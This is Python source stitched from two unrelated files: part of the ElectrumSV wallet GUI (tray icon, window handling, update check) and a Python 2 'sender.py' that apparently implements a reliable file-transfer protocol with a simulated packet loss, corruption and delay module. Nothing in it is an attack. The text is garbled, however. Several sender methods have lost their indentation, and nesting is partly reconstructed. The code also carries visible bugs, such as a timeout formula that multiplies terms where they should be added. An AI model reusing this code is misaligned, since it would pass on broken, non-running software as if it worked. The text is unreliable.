        """Return the tray icon matching the dark/light preference."""
        if self.dark_icon:
            return read_QIcon('electrumsv_dark_icon.png')
        else:
            return read_QIcon('electrumsv_light_icon.png')

    def _toggle_tray_icon(self) -> None:
        self.dark_icon = not self.dark_icon
        app_state.config.set_key("dark_icon", self.dark_icon, True)
        self.tray.setIcon(self._tray_icon())

    def _tray_activated(self, reason) -> None:
        """Double-clicking the tray icon toggles all windows shown/hidden."""
        if reason == QSystemTrayIcon.DoubleClick:
            if all([w.is_hidden() for w in self.windows]):
                for w in self.windows:
                    w.bring_to_top()
            else:
                for w in self.windows:
                    w.hide()

    def new_window(self, path: Optional[str], uri: Optional[str]=None) -> None:
        # Use a signal as can be called from daemon thread
        self.create_new_window_signal.emit(path, uri)

    def show_network_dialog(self, parent) -> None:
        """Show (or raise) the single shared network dialog."""
        if not app_state.daemon.network:
            parent.show_warning(_('You are using ElectrumSV in offline mode; restart '
                                  'ElectrumSV if you want to get connected'), title=_('Offline'))
            return
        if self.net_dialog:
            self.net_dialog.on_update()
            self.net_dialog.show()
            self.net_dialog.raise_()
            return
        from . import network_dialog
        self.net_dialog = network_dialog.NetworkDialog(app_state.daemon.network, app_state.config)
        self.net_dialog.show()

    def show_log_viewer(self) -> None:
        """Show (lazily creating) the log viewer window."""
        if self.log_window is None:
            self.log_window = SVLogWindow(None, self.log_handler)
        self.log_window.show()

    def _last_window_closed(self) -> None:
        """Dismiss the shared dialogs once no wallet windows remain."""
        for dialog in (self.net_dialog, self.log_window):
            if dialog:
                dialog.accept()

    def on_transaction_label_change(self, wallet: Wallet, tx_hash: bytes, text: str) -> None:
        self.label_sync.set_transaction_label(wallet, tx_hash, text)

    def on_keyinstance_label_change(self, account: AbstractAccount, key_id: int, text: str) -> None:
        self.label_sync.set_keyinstance_label(account, key_id, text)

    def _create_window_for_wallet(self, wallet: Wallet) -> ElectrumWindow:
        """Create, register and announce a window for an opened wallet."""
        w = ElectrumWindow(wallet)
        self.windows.append(w)
        self._build_tray_menu()
        self._register_wallet_events(wallet)
        self.window_opened_signal.emit(w)
        return w

    def _register_wallet_events(self, wallet: Wallet) -> None:
        # Bridge the wallet's contact callbacks onto Qt signals.
        wallet.contacts._on_contact_added = self._on_contact_added
        wallet.contacts._on_contact_removed = self._on_contact_removed
        wallet.contacts._on_identity_added = self._on_identity_added
        wallet.contacts._on_identity_removed = self._on_identity_removed

    def _on_identity_added(self, contact: ContactEntry, identity: ContactIdentity) -> None:
        self.identity_added_signal.emit(contact, identity)

    def _on_identity_removed(self, contact: ContactEntry, identity: ContactIdentity) -> None:
        self.identity_removed_signal.emit(contact, identity)

    def _on_contact_added(self, contact: ContactEntry, identity: ContactIdentity) -> None:
        self.contact_added_signal.emit(contact, identity)

    def _on_contact_removed(self, contact: ContactEntry) -> None:
        self.contact_removed_signal.emit(contact)

    def on_new_wallet_event(self, wallet_path: str, row: WalletEventRow) -> None:
        self.new_notification.emit(wallet_path, row)

    def get_wallet_window(self, path: str) -> Optional[ElectrumWindow]:
        """Return the window showing the wallet stored at `path`, if open."""
        for w in self.windows:
            if w._wallet.get_storage_path() == path:
                return w

    def get_wallet_window_by_id(self, account_id: int) -> Optional[ElectrumWindow]:
        """Return the window whose wallet contains the given account id."""
        for w in self.windows:
            for account in w._wallet.get_accounts():
                if account.get_id() == account_id:
                    return w

    def start_new_window(self, wallet_path: Optional[str], uri: Optional[str]=None,
                         is_startup: bool=False) -> Optional[ElectrumWindow]:
        '''Raises the window for the wallet if it is open.  Otherwise
        opens the wallet and creates a new window for it.'''
        for w in self.windows:
            if w._wallet.get_storage_path() == wallet_path:
                w.bring_to_top()
                break
        else:
            wizard_window: Optional[WalletWizard] = None
            if wallet_path is not None:
                is_valid, was_aborted, wizard_window = WalletWizard.attempt_open(wallet_path)
                if was_aborted:
                    return None
                if not is_valid:
                    wallet_filename = os.path.basename(wallet_path)
                    MessageBox.show_error(
                        _("Unable to load file '{}'.").format(wallet_filename))
                    return None
            else:
                # No path given: let the wizard select/create a wallet.
                wizard_window = WalletWizard(is_startup=is_startup)

            if wizard_window is not None:
                result = wizard_window.run()
                if result != QDialog.Accepted:
                    return None
                wallet_path = wizard_window.get_wallet_path()
                # We cannot rely on accept alone indicating success.
                if wallet_path is None:
                    return None

            wallet = app_state.daemon.load_wallet(wallet_path)
            assert wallet is not None
            w = self._create_window_for_wallet(wallet)
        if uri:
            w.pay_to_URI(uri)
        w.bring_to_top()
        w.setWindowState(w.windowState() & ~QtCore.Qt.WindowMinimized | QtCore.Qt.WindowActive)
        # this will activate the window
        w.activateWindow()
        return w

    def update_check(self) -> None:
        """Fetch release metadata in a background thread, unless update
        checking is disabled or we are offline."""
        if (not app_state.config.get('check_updates', True) or
                app_state.config.get("offline", False)):
            return

        def f():
            import requests
            try:
                response = requests.request(
                    'GET', "https://electrumsv.io/release.json",
                    headers={'User-Agent' : 'ElectrumSV'}, timeout=10)
                result = response.json()
                self._on_update_check(True, result)
            except Exception:
                self._on_update_check(False, sys.exc_info())

        # `daemon=True` replaces the deprecated `Thread.setDaemon()` call.
        t = threading.Thread(target=f, daemon=True)
        t.start()

    def _on_update_check(self, success: bool, result) -> None:
        """Record a successful check and fan the outcome out to windows.

        On failure `result` is the `sys.exc_info()` triple, not a dict.
        """
        if success:
            when_checked = datetime.datetime.now().astimezone().isoformat()
            app_state.config.set_key('last_update_check', result)
            app_state.config.set_key('last_update_check_time', when_checked, True)
        self.update_check_signal.emit(success, result)

    def initial_dialogs(self) -> None:
        '''Suppressible dialogs that are shown when first opening the app.'''
        dialogs.show_named('welcome-ESV-1.3.10')

    def event_loop_started(self) -> None:
        """Deferred startup work, run once the Qt event loop is live."""
        self.cosigner_pool = CosignerPool()
        self.label_sync = LabelSync()
        if app_state.config.get("show_crash_reporter", default=True):
            self.exception_hook = Exception_Hook(self)
        self.timer.start()
        signal.signal(signal.SIGINT, lambda *args: self.quit())
        self.initial_dialogs()
        path = app_state.config.get_cmdline_wallet_filepath()
        if not self.start_new_window(path, app_state.config.get('url'), is_startup=True):
            self.quit()

    def run_app(self) -> None:
        """Run the application until exit, then clean up tray/timer state."""
        when_started = datetime.datetime.now().astimezone().isoformat()
        app_state.config.set_key('previous_start_time', app_state.config.get("start_time"))
        app_state.config.set_key('start_time', when_started, True)
        self.update_check()

        # `.name = ...` replaces the deprecated `setName()` call.
        threading.current_thread().name = 'GUI'
        self.timer.setSingleShot(False)
        self.timer.setInterval(500)  # msec
        self.timer.timeout.connect(app_state.device_manager.timeout_clients)

        QTimer.singleShot(0, self.event_loop_started)
        self.exec_()

        logs.remove_handler(self.log_handler)
        # Shut down the timer cleanly
        self.timer.stop()
        # clipboard persistence
        # see http://www.mail-archive.com/pyqt@riverbankcomputing.com/msg17328.html
        event = QtCore.QEvent(QtCore.QEvent.Clipboard)
        self.sendEvent(self.clipboard(), event)
        self.tray.hide()

    def run_coro(self, coro, *args, on_done=None):
        '''Run a coroutine. on_done, if given, is passed the future containing the result or
        exception, and is guaranteed to be called in the context of the GUI thread.
        '''
        def task_done(future):
            self.async_tasks_done.emit()
        future = app_state.async_.spawn(coro, *args, on_done=on_done)
        future.add_done_callback(task_done)
        return future

    def run_in_thread(self, func, *args,
                      on_done: Optional[Callable[[concurrent.futures.Future], None]]=None):
        '''Run func(*args) in a thread. on_done, if given, is passed the future containing the
        result or exception, and is guaranteed to be called in the context of the GUI
        thread.
        '''
        return self.run_coro(run_in_thread, func, *args, on_done=on_done)
|
sender.py | import sys
import socket
import time
import timeit
from socket import *
import os
import struct
import hashlib
import pickle
import random
from threading import Thread
import time
import timeit
from operator import xor
import io
import threading
class Sender:
    def __init__(self):
        """Read the command-line configuration, slice the input file into
        MSS-sized segments, and initialise all sender/PLD bookkeeping state.

        NOTE(review): the sys.argv positions (3..14) are assumed to follow
        the launcher's argument order -- confirm against the invocation.
        """
        ack = 0
        flag = 0
        # Maximum segment size in bytes.
        mss = int(sys.argv[5])
        self.mass = mss
        # PLD probabilities: corruption, drop, delay.
        self.cd = float(sys.argv[9])
        self.dp = float(sys.argv[7])
        self.pdl = float(sys.argv[12])
        # Sliding window size in whole segments (bytes // MSS).
        window_1 = int(sys.argv[4])
        self.window_size = window_1//mss
        filename = str(sys.argv[3])
        f = io.open(filename,"rb")
        # Split the file into MSS-sized chunks; size_store accumulates the
        # running cumulative byte count used as the 'len' field of packets.
        self.data = []
        a = f.read(mss)
        size_store = []
        temp = 0
        cs = 0
        temp += len(a)
        size_store.append(temp)
        while a:
            self.data.append(a)
            a = f.read(mss)
            if a:
                temp += len(a)
                size_store.append(temp)
        self.size = size_store
        n = 0
        self.i = 0
        # Two parallel packet tables: entire_data may be mutated when a
        # packet is corrupted; entire_data1 keeps a pristine copy for
        # retransmission.  Indices 0 and 1 are handshake (SYN) entries.
        self.entire_data = { i : {'SEQ':0,'len':0,'CHECKSUM':'','DATA':'','SYN':0,'DATA_SIZE':len(self.data)+2} for i in range(0,len(self.data)+2)}
        count = 0
        self.entire_data1 = { i : {'SEQ':0,'len':0,'CHECKSUM':'','DATA':'', 'SYN':0,'DATA_SIZE':len(self.data)+2} for i in range(0,len(self.data)+2)}
        for i in range(0,2):
            self.entire_data[i]['SEQ'] = count
            self.entire_data1[i]['SEQ'] = count
            self.entire_data[i]['SYN'] = 1
            self.entire_data1[i]['SYN'] = 1
            self.entire_data[count]['len'] = i
            self.entire_data1[count]['len'] = i
            count+=1
        # Fill the data packets: sequence number, cumulative length, an MD5
        # digest of the payload as checksum, and the payload itself.
        for l in self.data:
            self.entire_data[count]['SEQ'] = count
            m = hashlib.md5(l)
            self.entire_data[count]['len'] = size_store[count-2]
            self.entire_data1[count]['len'] = size_store[count-2]
            self.entire_data[count]['CHECKSUM'] = m.hexdigest()
            self.entire_data[count]['DATA'] = l
            self.entire_data1[count]['SEQ'] = count
            m = hashlib.md5(l)
            self.entire_data1[count]['CHECKSUM'] = m.hexdigest()
            self.entire_data1[count]['DATA'] = l
            count += 1
        self.count1 = 0
        i = 0
        self.ack_count = 0
        # Per-packet ACK state machine: '' -> 'a' -> 'accessed' ->
        # 'retransmit' (fast retransmit after repeated duplicate ACKs).
        self.ack_window = {i : '' for i in range(0,len(self.data)+2)}
        self.window = self.window_size
        # t0 is the reference time for all log timestamps.
        self.t0 = timeit.default_timer()
        self.log = open("sender_log.txt","w+")
        # Per-packet send/receive timestamps for SampleRTT measurement.
        self.round_trip = {i : {'sent_time': 0, 'recive_time': 0} for i in range(0,len(self.data)+3)}
        self.delayed_packet = {'SEQ':0,'len':0,'CHECKSUM':'','DATA':'', 'SYN':0,'DATA_SIZE':len(self.data)+2}
        self.packet_delayed = 0
        self.delayed_packet_timer = 0
        # Maximum artificial delay (ms) applied to delayed packets.
        self.maxDelay = int(sys.argv[13])
        self.temp_timer = 0
        # PLD probabilities: duplication and reordering.
        self.pdup = float(sys.argv[8])
        self.preorder = float(sys.argv[10])
        self.is_reordered = 0
        self.reorder_count = 0
        # Number of packets a reordered packet is held back.
        self.maxOrder = int(sys.argv[11])
        self.reorder_packet = {}
        self.seed = int(sys.argv[14])
        self.real_count = 0
        # Statistics counters for the summary report.
        self.segments_droped = 0
        self.segments_corrupted = 0
        self.segments_reordered = 0
        self.segments_duplicated = 0
        self.segments_delayed = 0
        self.ToutRetransmission = 0
        self.FTransmission = 0
        self.DupAcks = 0
        self.Segments = 0
        self.pld_segments = 0
        # RTO estimation (RFC 6298 style) parameters.
        self.gamma = int(sys.argv[6])
        self.EstimatedRTT = 0.5
        self.DevRTT = 0.25
        random.seed(self.seed)
        self.TimeoutInterval = self.EstimatedRTT + 4 * self.DevRTT
        self.recently_sent = 0
        # rev flips to 1 once the first ACK (SYN-ACK) has been received.
        self.rev = 0
def corupt_data(self,cd):
rn = random.random()
if cd > rn:
return True
return False
def drop_packet(self,dp):
rn = random.random()
if dp > rn:
return True
return False
def delay_packet(self,pdl):
rn = random.random()
if pdl > rn:
return True
return False
def duplicate_packet(self, pdup):
rn = random.random()
if pdup > rn:
return True
return False
def packet_reorder(self, preorder):
rn = random.random()
if preorder > rn:
return True
return False
def delay_time(self):
rn = random.randint(0,self.maxDelay)
return rn/1000
def calculate_TimeoutIntervel(self, SampleRTT):
self.EstimatedRTT = 0.875 * self.EstimatedRTT + 0.125 * SampleRTT
self.DevRTT = 0.75 * self.DevRTT + 0.25 * abs(SampleRTT - self.EstimatedRTT)
TimeoutInterval = self.EstimatedRTT * self.gamma * self.DevRTT
if TimeoutInterval < 0.5:
self.TimeoutInterval = 0.5
return
if TimeoutInterval > 1.0:
self.TimeoutInterval = 1.0
return
self.TimeoutInterval = TimeoutInterval
    def send_data(self, clientSocket, packet_no):
        """Retransmit packet `packet_no` through the PLD module (fast
        retransmit path).  The packet may be dropped, duplicated, corrupted,
        reordered or delayed before (or instead of) being sent.

        NOTE(review): original indentation was lost; nesting reconstructed
        to mirror send_data_timeout() -- confirm against the original file.
        """
        self.Segments += 1
        # Drop: log only, never put the segment on the wire.
        if self.drop_packet(self.dp) and packet_no > 1:
            self.pld_segments += 1
            self.segments_droped += 1
            t1 = timeit.default_timer()
            self.log.write("{0:20}{1:10}{2:10}{3:10}{4:10}{5:10}\n".format("RXT/drop","{0:.3f}".format(t1-self.t0),"D",str(self.entire_data[packet_no]['len']+1),str(len(self.entire_data1[packet_no]['DATA'])),str(1)))
            return
        # Duplicate: send one extra pristine copy, then continue normally.
        if self.duplicate_packet(self.pdup) and packet_no > 1:
            self.pld_segments += 1
            self.segments_duplicated += 1
            t1 = timeit.default_timer()
            if self.count1 > 1:
                self.log.write("{0:20}{1:10}{2:10}{3:10}{4:10}{5:10}\n".format("snd/RXT/dup","{0:.3f}".format(t1-self.t0),"D",str(self.entire_data[packet_no]['len']+1),str(len(self.entire_data1[packet_no]['DATA'])),str(1)))
            sending_data = pickle.dumps(self.entire_data1[packet_no])
            clientSocket.send(sending_data)
        # Corrupt: flip the first payload byte, then send the damaged copy.
        if self.corupt_data(self.cd) and packet_no > 1:
            self.pld_segments += 1
            self.segments_corrupted += 1
            t1 = timeit.default_timer()
            self.log.write("{0:20}{1:10}{2:10}{3:10}{4:10}{5:10}\n".format("snd/RXT/corr","{0:.3f}".format(t1-self.t0),"D",str(self.entire_data[packet_no]['len']+1),str(len(self.entire_data1[packet_no]['DATA'])),str(1)))
            packet = self.entire_data[packet_no]
            p = list(packet['DATA'])
            p[0] = str(int(xor(bool(p[0]), bool(1))))
            packet['DATA'] = ''.join(p)
            sending_data = pickle.dumps(packet)
            t1 = timeit.default_timer()
            clientSocket.send(sending_data)
        else:
            # Reorder: hold this packet back until maxOrder packets pass.
            if self.packet_reorder(self.preorder) and self.count1 > 1 and self.is_reordered == 0:
                self.pld_segments += 1
                self.segments_reordered += 1
                self.is_reordered = 1
                self.reorder_packet = self.entire_data[packet_no]
                return
            # Delay: send a pristine copy later from a timer thread.
            if self.delay_packet(self.pdl) and self.count1 > 1:
                self.pld_segments += 1
                self.segments_delayed += 1
                delayed_packet = self.entire_data1[packet_no]
                t = threading.Timer(self.delay_time(), self.send_delayed_packet, [clientSocket, delayed_packet])
                t.start()
                return
            # Normal retransmission of the pristine copy.
            sending_data = pickle.dumps(self.entire_data1[packet_no])
            t1 = timeit.default_timer()
            self.log.write("{0:20}{1:10}{2:10}{3:10}{4:10}{5:10}\n".format("snd/RXT","{0:.3f}".format(t1-self.t0),"D",str(self.entire_data[packet_no]['len']+1),str(len(self.entire_data1[packet_no]['DATA'])),str(1)))
            clientSocket.send(sending_data)
            self.pld_segments += 1
        packet = {}
        return
    def send_data_timeout(self, clientSocket, packet_no):
        """Retransmit packet `packet_no` after a timeout, again subject to the
        PLD module (drop/duplicate/corrupt/reorder/delay).

        NOTE(review): near-duplicate of send_data(); original indentation was
        lost, nesting reconstructed symmetrically -- confirm against source.
        """
        self.Segments += 1
        # Drop: log only, never put the segment on the wire.
        if self.drop_packet(self.dp) and packet_no > 1:
            self.pld_segments += 1
            self.segments_droped += 1
            t1 = timeit.default_timer()
            self.log.write("{0:20}{1:10}{2:10}{3:10}{4:10}{5:10}\n".format("drop","{0:.3f}".format(t1-self.t0),"D",str(self.entire_data[packet_no]['len']+1),str(len(self.entire_data1[packet_no]['DATA'])),str(1)))
            return
        # Duplicate: send one extra pristine copy, then continue normally.
        if self.duplicate_packet(self.pdup) and packet_no > 1:
            self.pld_segments += 1
            self.segments_duplicated += 1
            t1 = timeit.default_timer()
            if self.count1 > 1:
                self.log.write("{0:20}{1:10}{2:10}{3:10}{4:10}{5:10}\n".format("snd/dup","{0:.3f}".format(t1-self.t0),"D",str(self.entire_data[packet_no]['len']+1),str(len(self.entire_data1[packet_no]['DATA'])),str(1)))
            sending_data = pickle.dumps(self.entire_data1[packet_no])
            clientSocket.send(sending_data)
        # Corrupt: flip the first payload byte, then send the damaged copy.
        if self.corupt_data(self.cd) and packet_no > 1:
            self.pld_segments += 1
            self.segments_corrupted += 1
            t1 = timeit.default_timer()
            self.log.write("{0:20}{1:10}{2:10}{3:10}{4:10}{5:10}\n".format("snd/corr","{0:.3f}".format(t1-self.t0),"D",str(self.entire_data[packet_no]['len']+1),str(len(self.entire_data1[packet_no]['DATA'])),str(1)))
            packet = self.entire_data[packet_no]
            p = list(packet['DATA'])
            p[0] = str(int(xor(bool(p[0]), bool(1))))
            packet['DATA'] = ''.join(p)
            sending_data = pickle.dumps(packet)
            t1 = timeit.default_timer()
            clientSocket.send(sending_data)
        else:
            # Reorder: hold this packet back until maxOrder packets pass.
            if self.packet_reorder(self.preorder) and self.count1 > 1 and self.is_reordered == 0:
                self.pld_segments += 1
                self.segments_reordered += 1
                self.is_reordered = 1
                self.reorder_packet = self.entire_data[packet_no]
                return
            # Delay: send a pristine copy later from a timer thread.
            if self.delay_packet(self.pdl) and self.count1 > 1:
                self.pld_segments += 1
                self.segments_delayed += 1
                delayed_packet = self.entire_data1[packet_no]
                t = threading.Timer(self.delay_time(), self.send_delayed_packet, [clientSocket, delayed_packet])
                t.start()
                return
            # Normal retransmission of the pristine copy.
            sending_data = pickle.dumps(self.entire_data1[packet_no])
            t1 = timeit.default_timer()
            self.pld_segments += 1
            self.log.write("{0:20}{1:10}{2:10}{3:10}{4:10}{5:10}\n".format("snd","{0:.3f}".format(t1-self.t0),"D",str(self.entire_data[packet_no]['len']+1),str(len(self.entire_data1[packet_no]['DATA'])),str(1)))
            clientSocket.send(sending_data)
        packet = {}
        return
    def send(self, clientSocket):
        """Main send loop: stream all packets through the sliding window and
        the PLD module until the final packet has been acknowledged.

        NOTE(review): original indentation was lost; nesting reconstructed so
        that the corrupt branch and the normal branch both fall through to
        the common clientSocket.send() at the bottom -- confirm against the
        original file.
        """
        print 'Sending'
        # Loop until the last entry in ack_window is marked (final ACK seen).
        while self.ack_window[len(self.ack_window)-1] == '':
            self.temp_timer = timeit.default_timer()
            # Only transmit while inside the window and there is data left.
            if self.count1 <= self.window and self.real_count <= self.window and self.count1 < len(self.data)+2 and self.real_count < len(self.data)+2:
                self.recently_sent = self.count1
                self.Segments += 1
                # A previously held-back (reordered) packet is due: send it now.
                if self.is_reordered == 1 and self.reorder_count == self.maxOrder:
                    t1 = timeit.default_timer()
                    if self.count1 > 1:
                        self.log.write("{0:20}{1:10}{2:10}{3:10}{4:10}{5:10}\n".format("snd/rord","{0:.3f}".format(t1-self.t0),"D",str(self.reorder_packet['len']+1),str(len(self.reorder_packet['DATA'])),str(1)))
                    sending_data = pickle.dumps(self.reorder_packet)
                    clientSocket.send(sending_data)
                    self.is_reordered = 0
                    self.reorder_count = 0
                    continue
                # A packet is being held back: count this packet against maxOrder.
                if self.is_reordered == 1 and self.reorder_count < self.maxOrder:
                    self.reorder_count += 1
                # Drop: log only, advance to the next packet.
                if self.drop_packet(self.dp) and self.count1 > 1:
                    self.pld_segments += 1
                    t1 = timeit.default_timer()
                    self.round_trip[self.count1]['sent_time'] = t1-self.t0
                    self.segments_droped += 1
                    t1 = timeit.default_timer()
                    if self.count1 > 1:
                        self.log.write("{0:20}{1:10}{2:10}{3:10}{4:10}{5:10}\n".format("drop","{0:.3f}".format(t1-self.t0),"D",str(self.entire_data[self.count1]['len']+1),str(len(self.entire_data[self.count1]['DATA'])),str(1)))
                    self.count1 += 1
                    self.real_count += 1
                    continue
                # Duplicate: send one extra copy first, then fall through.
                if self.duplicate_packet(self.pdup) and self.count1 > 1:
                    self.pld_segments += 1
                    self.segments_duplicated += 1
                    t1 = timeit.default_timer()
                    if self.count1 > 1:
                        self.log.write("{0:20}{1:10}{2:10}{3:10}{4:10}{5:10}\n".format("snd/dup","{0:.3f}".format(t1-self.t0),"D",str(self.entire_data[self.count1]['len']+1),str(len(self.entire_data[self.count1]['DATA'])),str(1)))
                    sending_data = pickle.dumps(self.entire_data[self.count1])
                    clientSocket.send(sending_data)
                    self.real_count += 1
                # Corrupt: flip the first payload byte; the damaged copy is
                # sent by the common send at the bottom of the loop body.
                if self.corupt_data(self.cd) and self.count1 > 1:
                    self.pld_segments += 1
                    t1 = timeit.default_timer()
                    self.round_trip[self.count1]['sent_time'] = t1-self.t0
                    self.segments_corrupted += 1
                    t1 = timeit.default_timer()
                    if self.count1 > 1:
                        self.log.write("{0:20}{1:10}{2:10}{3:10}{4:10}{5:10}\n".format("snd/corr","{0:.3f}".format(t1-self.t0),"D",str(self.entire_data[self.count1]['len']+1),str(len(self.entire_data[self.count1]['DATA'])),str(1)))
                    packet = self.entire_data[self.count1]
                    p = list(packet['DATA'])
                    p[0] = str(int(xor(bool(p[0]), bool(1))))
                    packet['DATA'] = ''.join(p)
                    sending_data = pickle.dumps(packet)
                    t1 = timeit.default_timer()
                else:
                    # Reorder: hold this packet back and move on.
                    if self.packet_reorder(self.preorder) and self.count1 > 1 and self.is_reordered == 0:
                        self.pld_segments += 1
                        t1 = timeit.default_timer()
                        self.round_trip[self.count1]['sent_time'] = t1-self.t0
                        self.segments_reordered += 1
                        self.is_reordered = 1
                        self.reorder_packet = self.entire_data[self.count1]
                        self.count1 += 1
                        self.real_count += 1
                        continue
                    # Delay: send later from a timer thread and move on.
                    if self.delay_packet(self.pdl) and self.count1 > 1:
                        self.pld_segments += 1
                        self.segments_delayed += 1
                        t1 = timeit.default_timer()
                        delayed_packet = self.entire_data[self.count1]
                        self.round_trip[delayed_packet['SEQ']]['sent_time'] = t1-self.t0
                        t = threading.Timer(self.delay_time(), self.send_delayed_packet, [clientSocket, delayed_packet])
                        t.start()
                        self.count1 += 1
                        self.real_count += 1
                        continue
                    t1 = timeit.default_timer()
                    # Packet 0: SYN of the handshake.
                    if self.count1 == 0:
                        t1 = timeit.default_timer()
                        self.log.write("{0:20}{1:10}{2:10}{3:10}{4:10}{5:10}\n".format("snd","{0:.3f}".format(t1-self.t0),"S",str(0),str(0),str(0)))
                    # Packet 1: busy-wait for the SYN-ACK (rev set by recive()),
                    # then log the handshake completion.
                    if self.count1 == 1:
                        t1 = timeit.default_timer()
                        while self.rev == 0:
                            sanal = 0
                        self.log.write("{0:20}{1:10}{2:10}{3:10}{4:10}{5:10}\n".format("rcv","{0:.3f}".format(t1-self.t0),"SA",str(0),str(0),str(1)))
                        self.log.write("{0:20}{1:10}{2:10}{3:10}{4:10}{5:10}\n".format("snd","{0:.3f}".format(t1-self.t0),"A",str(1),str(0),str(1)))
                    # Data packets: record send time for RTT estimation.
                    if self.count1 > 1:
                        self.pld_segments += 1
                        self.round_trip[self.count1]['sent_time'] = t1-self.t0
                        self.log.write("{0:20}{1:10}{2:10}{3:10}{4:10}{5:10}\n".format("snd","{0:.3f}".format(t1-self.t0),"D",str(self.entire_data[self.count1]['len']+1),str(len(self.entire_data[self.count1]['DATA'])),str(1)))
                    sending_data = pickle.dumps(self.entire_data[self.count1])
                clientSocket.send(sending_data)
                self.count1 += 1
                self.real_count += 1
def recive(self,clientSocket):
    """Receiver loop for the sender side: consume ACKs, drive RTT/timeout
    estimation, fast retransmit on triple-duplicate ACKs, and perform the
    connection teardown (FIN/ACK exchange) plus final statistics logging.

    NOTE(review): this is Python 2 code (print statement). Runs until the
    final ACK for the whole file is seen, then closes the socket and log.
    """
    ack_recived = 0
    while 1:
        # Re-arm the adaptive timeout before every blocking recv.
        clientSocket.settimeout(self.TimeoutInterval)
        try:
            ack_recived = int(clientSocket.recv(1024))
            print 'ACK = ',self.entire_data1[ack_recived]['len']
            self.rev = 1
            # First time this ACK arrives and we recorded its send time:
            # take an RTT sample and update the timeout interval.
            if self.ack_window[ack_recived] == '' and self.round_trip[ack_recived]['sent_time']:
                t1 = timeit.default_timer()
                self.round_trip[ack_recived]['recive_time'] = t1-self.t0
                sampleRTT = self.round_trip[ack_recived]['recive_time'] - self.round_trip[ack_recived]['sent_time']
                self.calculate_TimeoutIntervel(sampleRTT)
            # Duplicate-ACK state machine: '' -> 'accessed' on first ACK;
            # then 'a'/'accessed'/'retransmit' track duplicate counts.
            if self.ack_window[ack_recived] == 'a':
                self.DupAcks += 1
                t1 = timeit.default_timer()
                if ack_recived > 1:
                    self.log.write("{0:20}{1:10}{2:10}{3:10}{4:10}{5:10}\n".format("rcv/DA","{0:.3f}".format(t1-self.t0),"A","1", "0",str(self.entire_data1[ack_recived]['len']+1)))
                else:
                    self.log.write("{0:20}{1:10}{2:10}{3:10}{4:10}{5:10}\n".format("rcv/DA","{0:.3f}".format(t1-self.t0),"A","1", "0",str(1)))
                self.ack_window[ack_recived] = 'accessed'
                continue
            if self.ack_window[ack_recived] == 'accessed':
                self.DupAcks += 1
                t1 = timeit.default_timer()
                if ack_recived > 1:
                    self.log.write("{0:20}{1:10}{2:10}{3:10}{4:10}{5:10}\n".format("rcv/DA","{0:.3f}".format(t1-self.t0),"A","1", "0",str(self.entire_data1[ack_recived]['len']+1)))
                else:
                    self.log.write("{0:20}{1:10}{2:10}{3:10}{4:10}{5:10}\n".format("rcv/DA","{0:.3f}".format(t1-self.t0),"A","1", "0",str(1)))
                self.ack_window[ack_recived] = 'retransmit'
                continue
            # Third duplicate ACK: fast retransmit the next segment.
            if self.ack_window[ack_recived] == 'retransmit':
                self.DupAcks += 1
                self.FTransmission += 1
                t1 = timeit.default_timer()
                if ack_recived > 1:
                    self.log.write("{0:20}{1:10}{2:10}{3:10}{4:10}{5:10}\n".format("rcv/DA","{0:.3f}".format(t1-self.t0),"A","1", "0",str(self.entire_data1[ack_recived]['len']+1)))
                else:
                    self.log.write("{0:20}{1:10}{2:10}{3:10}{4:10}{5:10}\n".format("rcv/DA","{0:.3f}".format(t1-self.t0),"A","1", "0",str(1)))
                self.ack_window[ack_recived] = 'a'
                self.send_data(clientSocket, int(ack_recived)+1)
                continue
            # Fresh (cumulative) ACK: mark every earlier outstanding
            # segment as acknowledged and grow the send window.
            if self.ack_window[ack_recived] == '':
                t1 = timeit.default_timer()
                for keys in self.ack_window:
                    if keys <= ack_recived and self.ack_window[ack_recived] == '' and self.ack_window[keys] == '':
                        if self.count1 < len(self.data) + 2:
                            self.window += 1
                        self.ack_window[keys] = 'accesssed'
                    if keys > ack_recived:
                        break
                self.ack_window[ack_recived] = 'accessed'
                if ack_recived > 1:
                    self.log.write("{0:20}{1:10}{2:10}{3:10}{4:10}{5:10}\n".format("rcv","{0:.3f}".format(t1-self.t0),"A","1", "0",str(self.entire_data1[ack_recived]['len']+1)))
            # Everything is ACKed: start teardown (send FIN-style packet
            # with SYN == 3, wait for the peer's ACK and FIN, ACK back).
            if int(ack_recived) >= len(self.data)+1:
                clientSocket.settimeout(10)
                packet = {'SEQ':0,'CHECKSUM':'','DATA':'','SYN':0,'DATA_SIZE':0}
                packet['SEQ']= self.entire_data[len(self.entire_data)-1]['SEQ']+1
                packet['DATA'] = "DONE"
                packet['SYN'] = 3
                sending_data = pickle.dumps(packet)
                t1 = timeit.default_timer()
                self.log.write("{0:20}{1:10}{2:10}{3:10}{4:10}{5:10}\n".format("snd","{0:.3f}".format(t1-self.t0),"F",str(self.entire_data[len(self.entire_data)-1]['len']+1),str(0),str(1)))
                clientSocket.send(sending_data)
                rec = clientSocket.recv(1024)
                rec = ''
                while rec != '':
                    rec = clientSocket.recv(1024)
                t1 = timeit.default_timer()
                self.log.write("{0:20}{1:10}{2:10}{3:10}{4:10}{5:10}\n".format("rcv","{0:.3f}".format(t1-self.t0),"A",str(1),str(0),str(self.entire_data[len(self.entire_data)-1]['len']+2)))
                # Wait for the peer's FIN before sending the final ACK.
                while rec == '':
                    rec = clientSocket.recv(1024)
                t1 = timeit.default_timer()
                self.log.write("{0:20}{1:10}{2:10}{3:10}{4:10}{5:10}\n".format("rcv","{0:.3f}".format(t1-self.t0),"F",str(1),str(0),str(self.entire_data[len(self.entire_data)-1]['len']+2)))
                clientSocket.send('A')
                t1 = timeit.default_timer()
                self.log.write("{0:20}{1:10}{2:10}{3:10}{4:10}{5:10}\n".format("snd","{0:.3f}".format(t1-self.t0),"A",str(self.entire_data[len(self.entire_data)-1]['len']+2),str(0),str(2)))
                clientSocket.close()
                # Final transfer statistics appended to the log file.
                self.log.write("=============================================================\n")
                self.log.write("Size of the file (in Bytes) "+str(self.size[-1])+"\n")
                self.log.write("Segments transmitted (including drop & RXT) "+str(self.Segments+2)+"\n")
                self.log.write("Number of Segments handled by PLD "+str(self.pld_segments)+"\n")
                self.log.write("Number of Segments dropped "+str(self.segments_droped)+"\n")
                self.log.write("Number of Segments Corrupted "+str(self.segments_corrupted)+"\n")
                self.log.write("Number of Segments Re-ordered "+str(self.segments_reordered)+"\n")
                self.log.write("Number of Segments Duplicated "+str(self.segments_duplicated)+"\n")
                self.log.write("Number of Segments Delayed "+str(self.segments_delayed)+"\n")
                self.log.write("Number of Retransmissions due to TIMEOUT "+str(self.ToutRetransmission)+"\n")
